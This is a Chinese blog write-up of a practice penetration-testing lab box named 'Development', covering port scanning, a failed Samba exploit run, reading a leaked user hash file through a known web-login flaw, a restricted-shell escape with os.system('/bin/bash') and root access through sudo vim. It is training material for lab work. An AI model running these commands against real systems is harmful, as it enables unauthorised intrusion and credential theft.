OSCP打靶Day7:Development

admin 2022年7月19日20:21:39评论68 views字数 21168阅读70分33秒阅读模式

前言

  • 感谢各位师傅们的大量支持,这个公众号目前已经超过500个股东(关注)了!
  • 所以自北京时间2022年7月19号中午12:00起至7月25号中午12:00结束,本公众号发起抽奖活动, 抽奖的内容包括:
    • 一等奖:罗技G304无线鼠标 * 1 一份(价值249)
    • 二等奖:书籍:《红蓝攻防: 构建实战化网络安全防御体系》三份 (价值70)
    • 三等奖: 小米电动牙刷T100 五份 (价值39.9)
    • (已设置邀请好友或转发提高中奖率)
  • 关注本公众号并在公众号留言“我是大股东”即可参加抽奖活动
    点我去抽奖界面

信息收集阶段

Nmap

好家伙上来就一堆信息

└─$ sudo nmap -A -sV -T4 -p- 192.168.146.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-14 11:33 HKT
Nmap scan report for 192.168.146.74
Host is up (0.00032s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Thu, 14 Jul 2022 03:34:05 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to [email protected].</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 14 Jul 2022 03:34:06 GMT
|     Server: IIS 6.0
|     Allow: GET,POST,OPTIONS,HEAD
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Thu, 14 Jul 2022 03:34:06 GMT
|     Server: IIS 6.0
|     Content-Length: 293
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.146.74 Port 8080</address>
|_    </body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: IIS 6.0
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=7/14%Time=62CF8EA6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,330,"HTTP/1.1x20200x20OKrnDate:x20Thu,x2014x20Julx202
SF:022x2003:34:05x20GMTrnServer:x20IISx206.0rnLast-Modified:x20W
SF:ed,x2026x20Decx202018x2001:55:41x20GMTrnETag:x20"230-57de32091
SF:ad69"rnAccept-Ranges:x20bytesrnContent-Length:x20560rnVary:x2
SF:0Accept-EncodingrnConnection:x20closernContent-Type:x20text/html
SF:rnrn<html>rn<head><title>DEVELOPMENTx20PORTAL.x20NOTx20FORx20
SF:OUTSIDERSx20ORx20HACKERS!</title>rn</head>rn<body>rn<p>Welcome
SF:x20tox20thex20Developmentx20Page.</p>rn<br/>rn<p>Therex20arex
SF:20manyx20projectsx20inx20thisx20box.x20Viewx20somex20ofx20thes
SF:ex20projectsx20atx20html_pages.</p>rn<br/>rn<p>WARNING!x20Wex
SF:20arex20experimentingx20ax20host-basedx20intrusionx20detectionx20
SF:system.x20Reportx20allx20falsex20positivesx20tox20patrick@goodte
SF:ch.com.sg.</p>rn<br/>rn<br/>rn<br/>rn<hr>rn<i>Poweredx20b
SF:yx20IISx206.0</i>rn</body>rnrn<!--x20Searchingx20forx20deve
SF:lopmentx20secretx20page...x20wherex20couldx20itx20be?x20-->
SF:rnrn<!--x20Patrick,x20Headx20ofx20Development-->rnrn</html>
SF:rn"
)%r(HTTPOptions,A6,"HTTP/1.1x20200x20OKrnDate:x20Thu,x2014x
SF:20Julx202022x2003:34:06x20GMTrnServer:x20IISx206.0rnAllow:x2
SF:0GET,POST,OPTIONS,HEADrnContent-Length:x200rnConnection:x20close
SF:rnContent-Type:x20text/htmlrnrn"
)%r(RTSPRequest,1CC,"HTTP/1.1x2
SF:0400x20Badx20RequestrnDate:x20Thu,x2014x20Julx202022x2003:34:0
SF:6x20GMTrnServer:x20IISx206.0rnContent-Length:x20293rnConnect
SF:ion:x20closernContent-Type:x20text/html;x20charset=iso-8859-1rn
SF:rn<!DOCTYPEx20HTMLx20PUBLICx20"-//IETF//DTDx20HTMLx202.0//EN">
SF:n<html><head>n<title>400x20Badx20Request</title>n</head><body>n<h
SF:1>Badx20Request</h1>n<p>Yourx20browserx20sentx20ax20requestx20th
SF:atx20thisx20serverx20couldx20notx20understand.<brx20/>n</p>n<h
SF:r>n<address>IISx206.0x20Serverx20atx20192.168.146.74x20Portx
SF:208080</address>n</body></html>n"
);
MAC Address: 00:0C:29:92:E1:E7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 7s
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENTx00
|   Domain name: x00
|   FQDN: development
|_  System time: 2022-07-14T03:35:38+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-14T03:35:38
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.146.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.11 seconds

可以看到开放了22, 113, 139, 445, 8080端口 

先来尝试一下smb, 用searchsploit看一下有没有可用的漏洞 nmap下来的版本是3.x-4.x

┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ searchsploit samba   
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                          | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                        | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)              | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                            | linux/remote/9950.rb
Samba 3.0.24 (Linux) - '
lsa_io_trans_names' Heap Overflow (Metasploit)                        | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - '
lsa_io_trans_names' Heap Overflow (Metasploit)                      | solaris/remote/16329.rb
Samba 3.0.27a - '
send_mailslot()' Remote Buffer Overflow                                      | linux/dos/4732.c
Samba 3.0.29 (Client) - '
receive_smb_raw()' Buffer Overflow (PoC)                             | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                              | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - '
chain_reply' Memory Corruption (Metasploit)                       | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                                 | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)   | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                                     | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                                        | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                         | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                           | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - '
is_known_pipename()' Arbitrary Module Load (Metasploit)  | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                                    | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                                    | linux/dos/27778.txt
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory                      | multiple/remote/41740.txt
Samba < 2.0.5 - Local Overflow                                                                | linux/local/19428.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                             | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                                         | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                 | linux_x86/dos/36741.py

先尝试几个linux的RCE 

┌──(aacai㉿kali)-[~/Desktop/192.168.146.74] └─$ searchsploit -m linux/remote/37834.py
Exploit: Samba 3.5.11/3.6.3 - Remote Code Execution URL: https://www.exploit-db.com/exploits/37834 Path: /usr/share/exploitdb/exploits/linux/remote/37834.py File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/aacai/Desktop/192.168.146.74/37834.py

┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py                                                        1 ⨯

  {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}

  usage: 37834.py <targethost> <targetport> <myip> <myport> <target>

  targets:
    00) samba_3.6.3-debian6
    01) samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)
    02) target_finder (hardcode correct system addr)

                                                                                
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 139 192.168.146.63 4444 01            255 ⨯
{+} TRYING EIP=0x00000b20 OFFSET=0x000011d0Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range
                                                                                
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 139 192.168.146.63 4444 00                                                  1 ⨯
{+} TRYING EIP=0xb6d003c0 OFFSET=0x00009148Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range
                                                                                                                    
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 139 192.168.146.63 4444 02                                                  1 ⨯
{+} TRYING EIP=0xb6d1a3c0 OFFSET=0x00000000Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range
                                                                                                                    
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 445 192.168.146.63 4444 02                                                  1 ⨯
{+} TRYING EIP=0xb6d1a3c0 OFFSET=0x00000000Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range
                                                                                                                    
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 445 192.168.146.63 4444 01                                                  1 ⨯
{+} TRYING EIP=0x00000b20 OFFSET=0x000011d0Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range
                                                                                                                    
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ python2 37834.py 192.168.146.74 445 192.168.146.63 4444 00                                                  1 ⨯
{+} TRYING EIP=0xb6d003c0 OFFSET=0x00009148Traceback (most recent call last):
  File "37834.py", line 247, in <module>
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  File "37834.py", line 141, in exploit
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
IndexError: string index out of range

好吧, 并没有结果, 那从web端看看有什么东西

OSCP打靶Day7:Development

一个普普通通的web界面 用nikto和direseach扫描一下

┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ dirsearch -u http://192.168.146.74:8080                   

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/aacai/.dirsearch/reports/192.168.146.74-8080/_22-07-14_12-14-08.txt

Error Log: /home/aacai/.dirsearch/logs/errors-22-07-14_12-14-08.log

Target: http://192.168.146.74:8080/

Cannot connect to: 192.168.146.74:8080

Task Completed
                                                                                                                    
┌──(aacai㉿kali)-[~/Desktop/192.168.146.74]
└─$ 

─$ nikto -h  192.168.146.74:8080 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.74
+ Target Hostname:    192.168.146.74
+ Target Port:        8080
+ Start Time:         2022-07-14 12:08:36 (GMT8)
---------------------------------------------------------------------------
+ Server: IIS 6.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 230, size: 57de32091ad69, mtime: gzip


竟然扫不出来... 后来发现我用dirsearch一扫.. 这个web服务就down了 

不知道是我的问题还是这个机器的问题 关注一下页面上的信息

OSCP打靶Day7:Development

这里说明了有很多项目在html_pages这个目录里面, 访问一下

OSCP打靶Day7:Development


竟然能直接看到系统文件 看一下主页的源代码

OSCP打靶Day7:Development

这里提示让我们找一个development.html的文件, 

这不就是刚刚我们在html_pages里面看到的嘛 走着

OSCP打靶Day7:Development


再看一下源代码

OSCP打靶Day7:Development

他要我们访问./developmentsecretpage

OSCP打靶Day7:Development


访问了之后到了一个新的目录 点击Patrick's那个a标签的链接, 我被跳转到了patrick.php这个php页面

OSCP打靶Day7:Development


默认情况下我们是在他的用户里面的, 让我们退出试试

OSCP打靶Day7:Development

然后我尝试了一下用户名admin, 密码' 然后就直接报错了

OSCP打靶Day7:Development

这里有一个slogin_lib.inc.php报错了, 那我们去google看看有没有相关信息

头一个就是个exploit...

OSCP打靶Day7:Development

查看一下exploit的内容


OSCP打靶Day7:Development


这里面写到有一个RCE和一个slog_users.txt的文件 

先看看这个txt文件里面有什么

....拿到管理员密码

OSCP打靶Day7:Development

丢去破解一下md5试试


admin, 3cb1d13bb83f***********43d3a0eb
intern, 4a8a2b374f463b*******363b81 1234********654321
patrick, 87e6d56ce79af********3d0579e P***25
qiu, ee64497098d0926d********31f98   **u

只拿到了三个用户名的hash值

然后去连接一下ssh

└─$ ssh [email protected]                                                                                               1 ⨯
[email protected]'s password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-189-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jul 14 04:59:13 UTC 2022

  System load:  0.01               Processes:            175
  Usage of /:   31.2% of 19.51GB   Users logged in:      0
  Memory usage: 32%                IP address for ens33: 192.168.146.74
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

175 packages can be updated.
50 updates are security updates.

New release '
20.04.4 LTS' available.
Run '
do-release-upgrade' to upgrade to it.


Last login: Thu Jul 14 04:58:49 2022 from 192.168.146.63
Congratulations! You tried harder!
Welcome to Development!
Type '
?' or 'help' to get the list of allowed commands
intern:~$ echo os.system('
/bin/bash')
intern@development:~$ 

连接上来了

intern@development:~$ id
uid=1002(intern) gid=1006(intern) groups=1006(intern)
intern@development:~$ whoami
intern
intern@development:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:92:e1:e7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.74/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 62043sec preferred_lft 62043sec
    inet6 fe80::20c:29ff:fe92:e1e7/64 scope link 
       valid_lft forever preferred_lft forever
intern@development:~$ 

查看一下这个用户下的文件

intern@development:~$ ls -al
total 36
drwxr-xr-x 6 intern intern 4096 Jul 14 04:59 .
drwxr-xr-x 5 root   root   4096 Jun 14  2018 ..
drwxrwxrwx 9 intern intern 4096 Jul 16  2018 access
drwx------ 2 intern intern 4096 Jul 16  2018 .cache
drwx------ 3 intern intern 4096 Jul 16  2018 .gnupg
-rw------- 1 intern intern   32 Jul 14 04:59 .lhistory
drwxrwxr-x 3 intern intern 4096 Jul 15  2018 .local
-rw-r--r-- 1 intern intern   46 Dec 26  2018 local.txt
-rw-r--r-- 1 intern intern  299 Dec 26  2018 work.txt
intern@development:~$ 
intern@development:~$ cat work.txt 
1. Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.

2. Patrick'
s start of the third year in this company!

3. Attend the meeting to discuss if password policy should be relooked at.
intern@development:~$ cat local.txt 
Congratulations on obtaining a user shell. :)
intern@development:~$ 

看起来Patrick比较重要, su过去看看

intern@development:~$ su patrick
Password: 
patrick@development:/home/intern$ ls
access  local.txt  work.txt
patrick@development:/home/intern$ id
uid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)
patrick@development:/home/intern$ sudo -l
Matching Defaults entries for patrick on development:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User patrick may run the following commands on development:
    (ALL) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /bin/nano
patrick@development:/home/intern$ 

卧*, patrick有两个文件的sudu权限 

这里来个小知识, 有sudo权限的可以直接用:shell到root

patrick@development:/home/intern$ sudo vim
:
root@development:/home/intern# id
uid=0(root) gid=0(root) groups=0(root)
root@development:/home/intern# whoami
root
root@development:/home/intern# ip ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:92:e1:e7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.74/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 61820sec preferred_lft 61820sec
    inet6 fe80::20c:29ff:fe92:e1e7/64 scope link 
       valid_lft forever preferred_lft forever
root@development:/home/intern
root@development:/home/intern# cd 
root@development:~# ls
access.txt  password.txt
root@development:~# cat access.txt 
/-/-----/-/-
-/-/--/-/-/

  ACCESS PANEL

/-/-/--/-/-
-/-/-----/-/

LOGIN: _________
PASSWORD: ______

SORRY.
ACCESS DENIED.

YOU MUST...
TRY HARDER.
root@development:~# cat  password.txt 
(----------------------)
 (--------------------)
  (------------------)
   (----------------)
    (--------------)

     WELCOME TO THE
        PASSWORD
         PORTAL

        INTRUDER
         ALERT!

    (---------------)
   (-----------------)
  (-------------------)
 (---------------------)
(-----------------------)

 TO ROOT ME, YOU NEED TO

(-----------------------)

      TRY HARDER!!!

(-----------------------)
root@development:~




结语

  • 感谢各位师傅看到这里, 打靶不易创作不易, 耗费大量脑力, 这边Aaron实名建议点一下赞
  • 如果您想联系我, 可以直接添加我的微信号ID: wengchensmile, 来技术交流.
  • 我们下期再见!

原文始发于微信公众号(Aaron与安全的那些事):OSCP打靶Day7:Development

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月19日20:21:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP打靶Day7:Developmenthttps://cn-sec.com/archives/1186932.html

发表评论

匿名网友 填写信息